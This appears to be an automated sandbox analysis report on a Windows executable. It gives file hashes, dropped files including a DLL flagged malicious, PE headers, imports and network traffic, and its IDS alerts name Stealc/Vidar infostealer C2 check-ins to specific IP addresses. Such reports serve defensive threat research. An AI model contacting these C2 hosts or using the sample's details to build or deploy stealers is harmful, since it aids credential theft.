Preview:	.j.yvH.w....F.....m....^.OL`......c.`..Ldqsp.N.....v...\ae].yH.E.`^..d...m.W.U....L......]q..]hbT.Y.TLNcOP`.r.C.Lv.A...V^Fg.dr.i.^..o.GXp.H......yu...xEIAb.LGn_Y.........gjE[...hkhU..A..Adq.QlsO...`Rt..J]..s..u.j.......[lcxNuN.ZoANK..yth]q..t..DL.A`..Q.`_P...x.\..`..I.G.b.Iml.....MVfq.r[sE.HV..a.h.W.d.[QF.N...P.uaFNBdFj.s.W...x...Y...ZJ..x.u.iCyeyv.QxL.O..j.ckOGE^..xSv...^W].S.k\.en.VIuYfSuS...qu...f....K..]f...._.O.O.o.d...m.OArv...Lq....menEX..d..Qf..\FiRd.L.Vu.t.BJ...u.RR.JekI.PDg..g.H....\k..F..LX.a_.m..Bj.brCBh...v.a....ch.D[...G.....D....j.NaelL.F.^a.a.ur.^.tsN..ZH.Io.N.tr.f.exr.D.SNbHIR....]Jb.D.nlu..B.LnY..jp.n...bpmqb...Kc..y.ut.N._m.G.r.c..y.m..]cF.V.F...sMC.yrv..i....O..IAvn.vn..B.A.w.BDF...]M....b.G.XlB.xar..g.q...N..AU.E.Ox....R..k...vaP...S..sQ.....R[O..I.I.dma.T..S.E.y.a.FG...wOk..Q..\U.]..`..x\Z...ps.J..F.....Qf...Z.Pi.L..P.b.\.Tm.P.R.B.PU..d...k..[iS^.TH^N.hjrwwg._....wL....[.I.rt..g.]x..qh[Y.H.xn.N...A..wRF..W.V....jyU.Du.o...p..vO.m.lOTjk.HW.......L.dO....C..bQ.L..i.

C:\Users\user\AppData\Roaming\driverRemote_debug\macrospore.indd

Download File

Process:	C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
File Type:	data
Category:	dropped
Size (bytes):	1385173
Entropy (8bit):	7.824453259021933
Encrypted:	false
SSDEEP:	24576:3ThHnVpIact6qMIPrpLhmwg9lUKOxrcP4912kZp/GYOQWINQvshJC6lVwymgw:DhHVfC6q7PrpLhmwDKOxrg4r2kEINQvX
MD5:	31885BEFE89EAE873D959F47BB548157
SHA1:	4A1D665C491D334EAE72CDD5B784F2A064A8FBBF
SHA-256:	A06A3D6810B4B5F73A0B71487F9B32538C34F66E26F0DC1632F3D40BF0E11B71
SHA-512:	0C1561929D19E52229E8FE3295148C8E4BC73526A59028F9FBB5BD11D2A8163CC6137232B55082AA1FC1E5F444F583064F4BC7BF282730B754BEE3C9656ED5D0
Malicious:	false
Reputation:	unknown
Preview:	..ZJpL.......C\.bFNR.cgl\..j.......\u...KRCMZ....KY^.L..ap...BbB..J\.qH..o.e....]OZuwL..Nnvv..f.F.fV.T......n..Q....yhai....P.......l........O.sO.dX.RdX...L.i.q..UNub..IJ..C....FH.uq.xn..^Cfs..pb....RUlHfEr`..U....^wcX..Se.uYkc..kb.Z[O..K.F.u.i..pibZ]_O.`....\UJpL.eJ`..ro.xE.mJ]O.R...D.Cft...J..feJ...IuHV.fpvV.xnW.XaN..A..Z.JupSsC..u.N.Gm..j.L..[R.....Yv]U..hrwy.jV...oSK...ffiH..H.RK.gmJw.i.uK..rN.Ei.\PHj...gE...C..dC...u...N._.fYV.e.d.a..M.T....sd.k.....S.w.....R`k......Sd.Kg.i.\.m..p.w.s...]Gx..e^....Q...PBs.\W.e.Xv.....D.a[K].[V.Ku.^Q.s...Gu.d.LO.l.YN...k....QD.\..JN.tUG...OeM.KR..uK.t..V.RB.\.h.h....d.HA.t.i...[.an...y.....``^EiEXul.gUG..uH..Z.nGU....H..O.D...s.P.kmoSk.[ZVvO..X..ae..LqtTN..K.PDn...........]rZOy.V.Mq.bgP....xM..VD__....iup[.\Ma....ty.PKFid..g..nThl..w...ub......o.j.R.e....iuLb.p..wA.].d.f....Ub...mV.Xvv.U.f.E..A..Zv.ZP.d......LVi_...O..nwI\N.F...d..y..j..^C.Hu.Am[Jw.S]ul..d.m[..UQT.Hl..QDC.uZ..Ds.Z..W.X.w..^....ryJi`lj...O...xJ..jNVU.se.c.I.D.....O....P\GW`...Zn.E.x

C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.466475314379774
Encrypted:	false
SSDEEP:	49152:h2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTMq+PDXx1lWz0pd:tmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	EA945E6BC518D0B25AAC0FCE13AE6E16
SHA1:	4144AC69F72190F1AD163A7CC7BD38E18109122C
SHA-256:	6D9D8727E9D8C00EB74B27C6EE3FDC90D538F30CF6A07C4B939A03FC70CE59EE
SHA-512:	4E2F4CF61FC6364DDACA6B0BF6D917F8E136526DC1323A8BAA48166CB291285491CC2D083B65EBE30F3DC27F62B2E154A834C721140E6004596D655269239A95
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p...............................}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.419325349303115
Encrypted:	false
SSDEEP:	6144:lcifpi6ceLPL9skLmb0mbSWSPtaJG8nAgex285i2MMhA20X4WABlGuNL5+:Ci58bSWIZBk2MM6AFB9o
MD5:	5F35FF9768AB359185CDF262A7274072
SHA1:	D5747A8CDCD36209D97D4BD3D025A6BAD64114B2
SHA-256:	8D2A977AE00D6B39D65C3C5DD72697A9A1519252B2958BBDECF1F05378EB1EF4
SHA-512:	E89BF11FAA04B9528FDD39A868549B8E3F78B918EA8FF848943AAE4AEB5A29E8984F124C6AD77068BB1304B34D8E83C4DB08847812CA7E92B778DAF0D6156753
Malicious:	false
Reputation:	unknown
Preview:	regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.(j.Q................................................................................................................................................................................................................................................................................................................................................G\|.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.080954084460766
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	zLwT7vCojz.exe
File size:	485'377 bytes
MD5:	577592f54bb4b19d416913b1816f7971
SHA1:	b36d64d5c46982f85c890d129c439a678299d11e
SHA256:	1e9f56f3709d1ecef0ebd00e173acf65f93d84439647a193ae558728dddff327
SHA512:	606b53133070af64bbc4cefb181bf18a897082da9247f4cfc62652b90559e91bcf22c678cf762bd63a9bf03130720dea921d4dd7403956cbcb01459b6bd47b16
SSDEEP:	6144:dYGgupEJ12YQcP55RYd85n4roeyk5FNP0Pz1BHF+hzxYaE1cco:dYGgupEJ1brP5si5Iyk5wXQYnBo
TLSH:	D4A4C00372F0AC60E5622A319F2BB69C669FFD51DE11572B2E08610F66703E0F6A375D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.lFA.lFA.lFL..FY.lFL..F9.lFL..Fm.lFH..FF.lFA.mF/.lF.y.F@.lFL..F@.lF.y.F@.lFRichA.lF................PE..L.....sd...........

File Icon


Icon Hash:	492951455555510d

Static PE Info

General

Entrypoint:	0x403945
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6473CDB1 [Sun May 28 21:54:57 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	c9619f19f41ef1b7d232f47cfbcc330b

Entrypoint Preview

Instruction
call 00007FDC04D57E32h
jmp 00007FDC04D53DB5h
push 00000014h
push 00414DE8h
call 00007FDC04D549DAh
call 00007FDC04D5654Bh
movzx esi, ax
push 00000002h
call 00007FDC04D57DC5h
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007FDC04D53DB6h
xor ebx, ebx
jmp 00007FDC04D53DE5h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007FDC04D53D9Dh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007FDC04D53D8Fh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007FDC04D53DBBh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007FDC04D5485Ch
test eax, eax
jne 00007FDC04D53DBAh
push 0000001Ch
call 00007FDC04D53E91h
pop ecx
call 00007FDC04D579C3h
test eax, eax
jne 00007FDC04D53DBAh
push 00000010h
call 00007FDC04D53E80h
pop ecx
call 00007FDC04D56294h
and dword ptr [ebp-04h], 00000000h
call 00007FDC04D55B94h
test eax, eax
jns 00007FDC04D53DBAh
push 0000001Bh
call 00007FDC04D53E66h
pop ecx
call dword ptr [0040F0C4h]
mov dword ptr [04046868h], eax
call 00007FDC04D57E19h
mov dword ptr [00455820h], eax
call 00007FDC04D57A16h
test eax, eax
jns 00007FDC04D53DBAh

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x151fc	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c47000	0x22069	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xf1f0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x14798	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf000	0x18c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xdde3	0xde00	15b07b85bcd9520d4f37fdd0be763da8	False	0.6055567286036037	data	6.704408972550424	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xf000	0x6b20	0x6c00	148298c80b94a7d27eb0460d57fb10ca	False	0.3941333912037037	data	4.804310456243546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x16000	0x3c30880	0x3f800	b551e695ab88d39c5abb037711c2fff2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c47000	0x22069	0x22200	4b3ed349a7712de61b75308f83845ecd	False	0.4784655448717949	data	5.5474239505686285	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3c47a18	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Romanian	Romania	0.48587420042643925
RT_ICON	0x3c488c0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Romanian	Romania	0.5974729241877257
RT_ICON	0x3c49168	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Romanian	Romania	0.6463133640552995
RT_ICON	0x3c49830	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Romanian	Romania	0.634393063583815
RT_ICON	0x3c49d98	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Romanian	Romania	0.39097510373443983
RT_ICON	0x3c4c340	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Romanian	Romania	0.5079737335834896
RT_ICON	0x3c4d3e8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Romanian	Romania	0.5848360655737705
RT_ICON	0x3c4dd70	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Romanian	Romania	0.675531914893617
RT_ICON	0x3c4e1d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.5676972281449894
RT_ICON	0x3c4f080	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.5469314079422383
RT_ICON	0x3c4f928	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.6184971098265896
RT_ICON	0x3c4fe90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.4619294605809129
RT_ICON	0x3c52438	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.4896810506566604
RT_ICON	0x3c534e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.4934426229508197
RT_ICON	0x3c53e68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.4521276595744681
RT_ICON	0x3c542d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.4163113006396588
RT_ICON	0x3c55178	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.4657039711191336
RT_ICON	0x3c55a20	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania	0.5697004608294931
RT_ICON	0x3c560e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.4624277456647399
RT_ICON	0x3c56650	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.4640041493775934
RT_ICON	0x3c58bf8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.4831144465290807
RT_ICON	0x3c59ca0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.5004098360655738
RT_ICON	0x3c5a628	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.5567375886524822
RT_ICON	0x3c5aa90	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.4928038379530917
RT_ICON	0x3c5b938	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.4648014440433213
RT_ICON	0x3c5c1e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.44508670520231214
RT_ICON	0x3c5c748	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.27645228215767637
RT_ICON	0x3c5ecf0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.28728893058161353
RT_ICON	0x3c5fd98	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.30655737704918035
RT_ICON	0x3c60720	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.3351063829787234
RT_ICON	0x3c60b88	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Romanian	Romania	0.39019189765458423
RT_ICON	0x3c61a30	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Romanian	Romania	0.5703971119133574
RT_ICON	0x3c622d8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Romanian	Romania	0.5910138248847926
RT_ICON	0x3c629a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Romanian	Romania	0.5274566473988439
RT_ICON	0x3c62f08	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Romanian	Romania	0.5145228215767634
RT_ICON	0x3c654b0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Romanian	Romania	0.5841932457786116
RT_ICON	0x3c66558	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Romanian	Romania	0.5762295081967214
RT_ICON	0x3c66ee0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Romanian	Romania	0.6374113475177305
RT_STRING	0x3c67348	0x3ec	data	Romanian	Romania	0.4601593625498008
RT_STRING	0x3c67734	0x4b6	data	Romanian	Romania	0.44859038142620233
RT_STRING	0x3c67bec	0x18e	data	Romanian	Romania	0.5175879396984925
RT_STRING	0x3c67d7c	0x4a2	data	Romanian	Romania	0.43844856661045534
RT_STRING	0x3c68220	0x59c	data	Romanian	Romania	0.4449860724233983
RT_STRING	0x3c687bc	0x230	data	Romanian	Romania	0.49107142857142855
RT_GROUP_ICON	0x3c689ec	0x68	data	Romanian	Romania	0.7115384615384616
RT_GROUP_ICON	0x3c68a54	0x76	data	Romanian	Romania	0.6610169491525424
RT_GROUP_ICON	0x3c68acc	0x76	data	Romanian	Romania	0.6694915254237288
RT_GROUP_ICON	0x3c68b44	0x76	data	Romanian	Romania	0.6694915254237288
RT_GROUP_ICON	0x3c68bbc	0x68	data	Romanian	Romania	0.7211538461538461
RT_VERSION	0x3c68c24	0x1e4	data			0.5371900826446281
RT_MANIFEST	0x3c68e08	0x261	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators			0.5451559934318555

Imports

DLL	Import
KERNEL32.dll	LocalCompact, GetUserDefaultLCID, AddConsoleAliasW, CreateHardLinkA, GetTickCount, EnumTimeFormatsW, GetUserDefaultLangID, FindResourceExA, GetVolumeInformationA, GetLocaleInfoW, GetCompressedFileSizeA, MultiByteToWideChar, GetTempPathW, SetThreadLocale, ChangeTimerQueueTimer, SetLastError, GetProcAddress, FindFirstChangeNotificationW, BuildCommDCBW, LoadLibraryA, WriteConsoleA, InterlockedExchangeAdd, LocalAlloc, SetCalendarInfoW, GetExitCodeThread, RemoveDirectoryW, AddAtomA, SetNamedPipeHandleState, GlobalFindAtomW, GetModuleFileNameA, GetOEMCP, GlobalUnWire, LoadLibraryExA, ReadConsoleInputW, GetWindowsDirectoryW, AddConsoleAliasA, SetFileAttributesA, GetComputerNameA, WriteConsoleW, GetStringTypeW, GetLastError, HeapFree, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapAlloc, GetProcessHeap, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, WriteFile, GetModuleFileNameW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, LCMapStringW, GetConsoleCP, GetConsoleMode, SetFilePointerEx, SetStdHandle, FlushFileBuffers, OutputDebugStringW, CreateFileW
ADVAPI32.dll	DeregisterEventSource
WINHTTP.dll	WinHttpConnect

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/23/24-09:43:14.069288	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49703	185.172.128.76	192.168.2.7
04/23/24-09:43:08.941626	TCP	2856233	ETPRO TROJAN Win32/Unknown Loader Related Activity (GET)	49699	80	192.168.2.7	185.172.128.90
04/23/24-09:43:14.396563	TCP	2051831	ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	80	49703	185.172.128.76	192.168.2.7
04/23/24-09:43:13.760484	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49703	80	192.168.2.7	185.172.128.76
04/23/24-09:43:13.365491	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49703	80	192.168.2.7	185.172.128.76
04/23/24-09:43:14.083688	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49703	80	192.168.2.7	185.172.128.76

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 09:43:03.428780079 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 23, 2024 09:43:05.834959030 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 23, 2024 09:43:06.975534916 CEST	49675	443	192.168.2.7	104.98.116.138
Apr 23, 2024 09:43:06.975533962 CEST	49674	443	192.168.2.7	104.98.116.138
Apr 23, 2024 09:43:07.147403955 CEST	49672	443	192.168.2.7	104.98.116.138
Apr 23, 2024 09:43:08.734082937 CEST	49699	80	192.168.2.7	185.172.128.90
Apr 23, 2024 09:43:08.941339970 CEST	80	49699	185.172.128.90	192.168.2.7
Apr 23, 2024 09:43:08.941626072 CEST	49699	80	192.168.2.7	185.172.128.90
Apr 23, 2024 09:43:08.941626072 CEST	49699	80	192.168.2.7	185.172.128.90
Apr 23, 2024 09:43:09.147363901 CEST	80	49699	185.172.128.90	192.168.2.7
Apr 23, 2024 09:43:09.850944996 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 23, 2024 09:43:10.193666935 CEST	80	49699	185.172.128.90	192.168.2.7
Apr 23, 2024 09:43:10.195127010 CEST	49699	80	192.168.2.7	185.172.128.90
Apr 23, 2024 09:43:10.225553989 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 23, 2024 09:43:10.274694920 CEST	49700	80	192.168.2.7	185.172.128.228
Apr 23, 2024 09:43:10.478960037 CEST	80	49700	185.172.128.228	192.168.2.7
Apr 23, 2024 09:43:10.479042053 CEST	49700	80	192.168.2.7	185.172.128.228
Apr 23, 2024 09:43:10.479135990 CEST	49700	80	192.168.2.7	185.172.128.228
Apr 23, 2024 09:43:10.647461891 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 23, 2024 09:43:10.684427023 CEST	80	49700	185.172.128.228	192.168.2.7
Apr 23, 2024 09:43:10.685028076 CEST	80	49700	185.172.128.228	192.168.2.7
Apr 23, 2024 09:43:10.687123060 CEST	49700	80	192.168.2.7	185.172.128.228
Apr 23, 2024 09:43:10.769995928 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:10.973980904 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:10.974056005 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:10.974117994 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:10.975532055 CEST	49677	443	192.168.2.7	20.50.201.200
Apr 23, 2024 09:43:11.178062916 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178503990 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178518057 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178528070 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178539991 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178551912 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178563118 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178580999 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178591967 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178605080 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178607941 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.178611040 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.178647995 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.178702116 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.382855892 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.382879972 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.382894993 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.382906914 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.382920027 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.382934093 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.382936954 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.382966995 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.383014917 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.383028984 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383044004 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383057117 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383074045 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383107901 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.383114100 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383126020 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383138895 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383152008 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383163929 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383173943 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.383176088 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383188963 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383200884 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383213043 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383213997 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.383227110 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.383250952 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.383276939 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.587212086 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587228060 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587239981 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587251902 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587265015 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587279081 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587291956 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587304115 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587316990 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587328911 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587337971 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.587342978 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587356091 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587371111 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587382078 CEST	80	49701	185.172.128.59	192.168.2.7
Apr 23, 2024 09:43:11.587435007 CEST	49701	80	192.168.2.7	185.172.128.59
Apr 23, 2024 09:43:11.587435007 CEST	49701	80	192.168.2.7	185.172.128.59
